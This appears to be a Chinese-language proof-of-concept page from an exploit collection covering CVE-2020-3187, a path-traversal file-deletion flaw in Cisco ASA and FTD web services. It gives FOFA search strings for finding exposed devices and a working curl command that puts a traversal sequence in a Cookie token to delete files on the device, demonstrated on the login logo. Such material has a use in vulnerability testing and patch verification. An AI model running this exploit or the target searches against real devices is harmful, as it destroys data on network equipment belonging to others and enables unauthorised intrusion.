Awesome-POC/network-device/Cisco ASA设备任意文件删除漏洞 CVE-2020-3187.md

54 lines
1.2 KiB
Markdown
Raw Normal View History

2022-02-20 16:14:31 +08:00
# Cisco ASA设备任意文件删除漏洞 CVE-2020-3187
## 漏洞描述
Cisco ASA Software和FTD Software中的Web服务接口存在路径遍历漏洞该漏洞源于程序没有对HTTP URL进行正确的输入验证。远程攻击者可通过发送带有目录遍历序列的特制HTTP请求利用该漏洞读取并删除系统上的敏感信息。
## 漏洞影响
- Cisco ASA设备
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162118289.png)
- Cisco FTD设备
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162119368.png)
## FOFA
```
/+CSCOE+/
Cisco-ASA
```
## 漏洞复现
访问 http://xxx.xxx.xxx.xxx/+CSCOE+/session_password.html 存在则可能出现此漏洞
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162119941.png)
例如我们删除一张图片 http://xxx.xxx.xxx.xxx/+CSCOU+/csco_logo.gif
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162119367.png)
使用 curl 发送请求
```shell
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://xxx.xxx.xxx.xxx/+CSCOE+/session_password.html
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162119779.png)
成功删除图标